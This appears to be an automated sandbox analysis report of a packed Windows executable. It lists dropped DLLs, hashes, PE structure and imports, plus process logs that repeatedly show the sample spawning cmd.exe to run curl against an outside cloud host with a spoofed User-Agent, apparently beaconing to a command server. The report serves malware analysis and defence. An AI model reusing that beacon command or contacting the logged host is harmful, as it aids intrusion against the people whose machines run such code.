SHA1:	BBF272DAB014D4CDE1A57831A2DAF4FDE03B4884
SHA-256:	C1541ED4DC6879A136BF532393F7CEFD3C48AD371D2ED9965E7CBD44C87A1137
SHA-512:	0E323B44B4ED7959C5F6409E565707E6E402382C950D2A0FC18D18F56AB588A49A260C99ECBDA1BDB3778BE131FB71B1B1158D852981E2E86D0B989B05496E02
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d................." .........@...............................................P............`A........................................P...a............@...............@...!..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-string-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25032
Entropy (8bit):	5.076324008887822
Encrypted:	false
SSDEEP:	768:8ozmT5yguNvZ5VQgx3SbwA71IkF1z9pr:8ozmT5yguNvZ5VQgx3SbwA71IOz9J
MD5:	535D1195F493F7D92FE9007258494EBC
SHA1:	1BF95EC546A6C1A8832D9002B7CD01265A1BBDAD
SHA-256:	4429B8E6707645FB503EBC3BD50CE2A84F559B6A2ED778196835808BDFEC2F48
SHA-512:	CD47F34032FC59A89DD286115DB2CC2D1918F6ECC069FA37D2295126876FC5C931D6272892FB22DB5EFF1F810DE818E64E6140617786A4D3FB153FD80C107468
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d.....R.........." .........@...............................................P.......}....`A........................................P................@...............@...!..............p............................................................................rdata../........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-time-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20928
Entropy (8bit):	4.9966389304384515
Encrypted:	false
SSDEEP:	192:oNDuWBhWUWYnO/VWQ4uWaaEyCCJky1qnajganQw:zWBhWCUNQR1lsQX
MD5:	ED44B4AAC3C881A9BC524D15AE3F3944
SHA1:	A87983D6C714AAC9242BB60037864139863B1848
SHA-256:	F3E6F692CEC86ADB3985B929345C731469777AEAEB088E3CE070957DF481F924
SHA-512:	25513C666F228365CE7E092782A92FB7EB144F6B3293F896B08317C36323006BA10F4133BBFDADD2576053C1D6AC0E28CC3AD5798B92EEC34FC8FA36E8D83047
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d................." .........0...............................................@............`A........................................P................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-utility-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20928
Entropy (8bit):	4.525945528506043
Encrypted:	false
SSDEEP:	192:evbjfHQduLWBhWVWYnO/VWQ4uWM6cA5E8qnajTw+CCevq:UfFWBhWFUix5E8lvwDDq
MD5:	E79464524FBC2C266DA52D0A903D85D3
SHA1:	6BAD715617992277751A8DDFC180BA291BA75D59
SHA-256:	6C78D4ABA91877C5BB33E545B6A69A818F377E07FF62E791B804FA5B4D2BCF02
SHA-512:	DEF71789E238ECD3B2D68DBD204ACC62537AD39CE50A5BF09F320FC8CACC1B3F561822784D006AB2145EAB5AB7BE3F74C1C773FBE814EFA040A1DBB3FFA6744E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d...F............." .........0...............................................@......a9....`A........................................P...^............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1437271
Entropy (8bit):	5.59104493943412
Encrypted:	false
SSDEEP:	24576:mQR5pATt7xm4lUKdcubgAnyfb0s0iwhBdYf9P3sGHHl:mQR5pQxmgGL
MD5:	2EFEAB81308C47666DFFFC980B9FE559
SHA1:	8FBB7BBDB97E888220DF45CC5732595961DBE067
SHA-256:	A20EEB4BA2069863D40E4FEAB2136CA5BE183887B6368E32F1A12C780A5AF1AD
SHA-512:	39B030931A7A5940EDC40607DCC9DA7CA1BF479E34EBF45A1623A67D38B98EB4337B047CC8261038D27ED9E9D6F2B120ABBF140C6C90D866CDBA0A4C810AC32C
Malicious:	false
Preview:	PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

C:\Users\user\AppData\Local\Temp\_MEI68922\libcrypto-1_1.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3441496
Entropy (8bit):	6.09856168197229
Encrypted:	false
SSDEEP:	49152:M3TKuk2CQIU6iV9OjPW9tmR+NtkYlhIo4QKLb0y+HnuJ1kQSYrLs1fEY7NPiNEsZ:nv+QYRKZSnfEYwNEs21CPwDv3uFfJ5
MD5:	80B72C24C74D59AE32BA2B0EA5E7DAD2
SHA1:	75F892E361619E51578B312605201571BFB67FF8
SHA-256:	EB975C94E5F4292EDD9A8207E356FE4EA0C66E802C1E9305323D37185F85AD6D
SHA-512:	08014EE480B5646362C433B82393160EDF9602E4654E12CD9B6D3C24E98C56B46ADD9BF447C2301A2B2E782F49C444CB8E37EE544F38330C944C87397BDD152A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............H...H...H..#H...H..I...H..I...H..I...H..I...H...H"..Hn.I...H..I...H..I..H..I...H..OH...H..I...HRich...H........PE..d...'{.c.........." ..."..$...................................................4......4...`..........................................w/..h...*4.@....`4.\|....`2.....Z4.X)...p4..O....,.8.............................,.@............ 4..............................text...t.$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata.......`2.......1.............@..@.idata..^#... 4..$....3.............@..@.00cfg..u....P4.......3.............@..@.rsrc...\|....`4.......3.............@..@.reloc...x...p4..z....3.............@..B................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\python311.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5764888
Entropy (8bit):	6.090010350264476
Encrypted:	false
SSDEEP:	98304:ZjCxzAISyt+EaudO141ibXHkMLyP59mJ3:ZjCxzAISXElO13L09
MD5:	1FE47C83669491BF38A949253D7D960F
SHA1:	DE5CC181C0E26CBCB31309FE00D9F2F5264D2B25
SHA-256:	0A9F2C98F36BA8974A944127B5B7E90E638010E472F2EB6598FC55B1BDA9E7AE
SHA-512:	05CC6F00DB128FBCA02A14F60F86C049855F429013F65D91E14EA292D468BF9BFDEEBC00EC2D54A9FB5715743A57AE3AB48A95037016240C02AABE4BFA1A2FF4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.K..K..K....+.I......E..../.G......C....).O..B..Q....+.@..K.+.....'.....J.....J...(.J..RichK.*.........................PE..d....~.c.........." ...".b%..27.....LP........................................\......hX...`..........................................@.....\|eA.......[.......V.@0....W../....[..C....).T...........................`.).@.............%..............................text...z`%......b%................. ..`.rdata........%......f%.............@..@.data.........A..L...pA.............@....pdata..@0....V..2....Q.............@..@PyRuntim......X.......S.............@....rsrc.........[......zV.............@..@.reloc...C....[..D....V.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\select.pyd

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30488
Entropy (8bit):	6.579636105002456
Encrypted:	false
SSDEEP:	384:N1ecReJKCHqeUI7A700EZ9IJQGzHQIYiSy1pCQ82Pxh8E9VF0Nyqnn:3eUeJPHqgbD9IJQGD5YiSyvxPxWEUn
MD5:	4AC28414A1D101E94198AE0AC3BD1EB8
SHA1:	718FBF58AB92A2BE2EFDB84D26E4D37EB50EF825
SHA-256:	B5D4D5B6DA675376BD3B2824D9CDA957B55FE3D8596D5675381922EF0E64A0F5
SHA-512:	2AC15E6A178C69115065BE9D52C60F8AD63C2A8749AF0B43634FC56C20220AFB9D2E71EBED76305D7B0DCF86895ED5CDFB7D744C3BE49122286B63B5EBCE20C2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t..t'..t'..t'..'..t'..u&..t'..q&..t'..p&..t'..w&..t'/.u&..t'..u'..t'..u&..t'/.y&..t'/.t&..t'/..'..t'/.v&..t'Rich..t'................PE..d....~.c.........." ...".....2............................................................`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\ucrtbase.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1118664
Entropy (8bit):	6.65702812073048
Encrypted:	false
SSDEEP:	24576:WbDDZA6rBwy/fnrdHODCrGQY8lP+kpcKsqWmxvSZX0ypOI:f2/fkDCrZR+k+q9I
MD5:	B0397BB83C9D579224E464EEBF40A090
SHA1:	81EFDFE57225DFE581AAFB930347535F08F2F4CE
SHA-256:	D2EBD8719455AE4634D00FD0D0EB0C3AD75054FEE4FF545346A1524E5D7E3A66
SHA-512:	E72A4378ED93CFB3DA60D69AF8103A0DCB9A69A86EE42F004DB29771B00A606FBC9CBC37F3DAA155D1D5FE85F82C87CA9898A39C7274462FCF5C4420F0581AB3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.../..L/..L/..L&.0L...L/..L...L..^L...L..M...L..M...L..MO..L..Mc..L..M...L..\L...L..M...LRich/..L........PE..d...L#............" ..... ..........0]..............................................~.....`A........................................p....................................!..............p............................J..8............u..(............................text...x........ .................. ..`.rdata.......0.......0..............@..@.data....&....... ..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1141016
Entropy (8bit):	5.435126675528636
Encrypted:	false
SSDEEP:	12288:r3kYbfjwR6nbnonRiPDjRrO5184EPYPx++ZiLKGZ5KXyVH4eD1y:rUYbM60IDJcjEwPgPOG6Xyd461y
MD5:	2AB7E66DFF1893FEA6F124971221A2A9
SHA1:	3BE5864BC4176C552282F9DA5FBD70CC1593EB02
SHA-256:	A5DB7900ECD5EA5AB1C06A8F94B2885F00DD2E1ADF34BCB50C8A71691A97804F
SHA-512:	985480FFFCC7E1A25C0070F44492744C3820334A35B9A72B9147898395AB60C7A73EA8BBC761DE5CC3B6F8799D07A96C2880A7B56953249230B05DD59A1390AD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t.t.t.}...r.;...v.;...y.;...\|.;...w.....w.?...v.t.%.....u.....u...y.u.....u.Richt.........................PE..d....~.c.........." ...".@..........P*...................................................`.............................................X............`.......P..0....:.../...p.......]..T............................[..@............P..x............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data...H....0......................@....pdata..0....P.......&..............@..@.rsrc........`......................@..@.reloc.......p.......8..............@..B................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.972535119810673
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	7'319'146 bytes
MD5:	93517c6eb21cd65e329b0acd9f6db5af
SHA1:	56866045c907c47dc4fcd2844117e1fd0f57ba37
SHA256:	08c2b931e06327dd440f89827e6556ac9e7966dc9e01dc2012aba9db90166957
SHA512:	699626e4d1fd0cb86c330ee78ae5c6c2fe07e3c990426705d2bb25afee034457d07da71f13f119ebc5882a1a5288b5726e7e3459a97b432a606b2fa9bb3e2c5b
SSDEEP:	196608:tdlJNxbAQnwejuJDUX47dwdW01XCZB4nCrD:TNxnaUX47d4dyoo
TLSH:	8B7633E4F1F185EED81AC67DE961582063B278A52778968F1361132A1E33363583FF1E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc.....[hc...`.Qhc...g.Ihc...f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d..

File Icon


Icon Hash:	e5e4999d85453d13

Static PE Info

General

Entrypoint:	0x14000c0d0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x67361D80 [Thu Nov 14 15:55:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	456e8615ad4320c9f54e50319a19df9c

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F0E08E0F5BCh
dec eax
add esp, 28h
jmp 00007F0E08E0F1DFh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F0E08E0F988h
test eax, eax
je 00007F0E08E0F383h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F0E08E0F367h
dec eax
cmp ecx, eax
je 00007F0E08E0F376h
xor eax, eax
dec eax
cmpxchg dword ptr [0003843Ch], ecx
jne 00007F0E08E0F350h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F0E08E0F359h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007F0E08E0F369h
mov byte ptr [00038425h], 00000001h
call 00007F0E08E0EAB5h
call 00007F0E08E0FDA0h
test al, al
jne 00007F0E08E0F366h
xor al, al
jmp 00007F0E08E0F376h
call 00007F0E08E1C8AFh
test al, al
jne 00007F0E08E0F36Bh
xor ecx, ecx
call 00007F0E08E0FDB0h
jmp 00007F0E08E0F34Ch
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [000383ECh], 00000000h
mov ebx, ecx
jne 00007F0E08E0F3C9h
cmp ecx, 01h
jnbe 00007F0E08E0F3CCh
call 00007F0E08E0F8FEh
test eax, eax
je 00007F0E08E0F38Ah
test ebx, ebx
jne 00007F0E08E0F386h
dec eax
lea ecx, dword ptr [000383D6h]
call 00007F0E08E1C6A2h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c76c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x49000	0x275b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x46000	0x2208	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x71000	0x768	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x39dc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x39c80	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x450	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29210	0x29400	aca64598002ecff9eefbc96554edf015	False	0.5511067708333334	data	6.4784482217419175	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12642	0x12800	3f68bcf79e5313449633d0f17f028bf0	False	0.5245196368243243	data	5.750849990601124	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x73d8	0xe00	d0a288978c66419b180b35f625b6dce7	False	0.13532366071428573	data	1.8378139998458343	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x46000	0x2208	0x2400	74cf3ea22e0a1756984435d6f80f7da5	False	0.4671223958333333	data	5.259201915045256	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x49000	0x275b8	0x27600	56fcef429869229cb2d36c9280936f2e	False	0.14658978174603174	data	4.764665561017148	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x71000	0x768	0x800	71de9271648326ec88350e903470cf3e	False	0.5576171875	data	5.283119454571673	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x49208	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	0.09755412279664025
RT_ICON	0x59a30	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	0.15855581248686146
RT_ICON	0x62ed8	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	0.1821626617375231
RT_ICON	0x68360	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	0.17483467170524328
RT_ICON	0x6c588	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.2572614107883817
RT_ICON	0x6eb30	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.3177767354596623
RT_ICON	0x6fbd8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.5168439716312057
RT_GROUP_ICON	0x70040	0x68	data	0.7692307692307693
RT_MANIFEST	0x700a8	0x50d	XML 1.0 document, ASCII text	0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, GetLastError, FormatMessageW, GetModuleFileNameW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, CreateDirectoryW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, GetEnvironmentStringsW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, WaitForSingleObject, Sleep, GetCurrentProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Network Behavior

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2024 15:39:07.463473082 CET	53	59863	1.1.1.1	192.168.2.4
Nov 27, 2024 15:39:17.882081985 CET	53	49436	1.1.1.1	192.168.2.4
Nov 27, 2024 15:39:28.320605993 CET	53	55611	1.1.1.1	192.168.2.4
Nov 27, 2024 15:39:38.753812075 CET	53	56990	1.1.1.1	192.168.2.4
Nov 27, 2024 15:39:49.334815979 CET	53	61457	1.1.1.1	192.168.2.4
Nov 27, 2024 15:39:59.726466894 CET	53	56644	1.1.1.1	192.168.2.4
Nov 27, 2024 15:40:10.207832098 CET	53	50061	1.1.1.1	192.168.2.4
Nov 27, 2024 15:40:20.547406912 CET	53	56566	1.1.1.1	192.168.2.4
Nov 27, 2024 15:40:31.047990084 CET	53	51075	1.1.1.1	192.168.2.4
Nov 27, 2024 15:40:41.381201029 CET	53	52133	1.1.1.1	192.168.2.4
Nov 27, 2024 15:40:52.234582901 CET	53	58624	1.1.1.1	192.168.2.4
Nov 27, 2024 15:41:03.086978912 CET	53	54906	1.1.1.1	192.168.2.4

Target ID:	0
Start time:	09:39:03
Start date:	27/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x7ff6399b0000
File size:	7'319'146 bytes
MD5 hash:	93517C6EB21CD65E329B0ACD9F6DB5AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	09:39:04
Start date:	27/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x7ff6399b0000
File size:	7'319'146 bytes
MD5 hash:	93517C6EB21CD65E329B0ACD9F6DB5AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	09:39:05
Start date:	27/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Imagebase:	0x7ff789d00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:39:05
Start date:	27/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:39:06
Start date:	27/11/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Imagebase:	0x7ff645840000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:39:16
Start date:	27/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Imagebase:	0x7ff789d00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 2080, Parent PID: 4284

General

Target ID:	6
Start time:	09:39:16
Start date:	27/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:39:16
Start date:	27/11/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Imagebase:	0x7ff645840000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:39:26
Start date:	27/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Imagebase:	0x7ff789d00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 3736, Parent PID: 3632

General

Target ID:	12
Start time:	09:39:26
Start date:	27/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
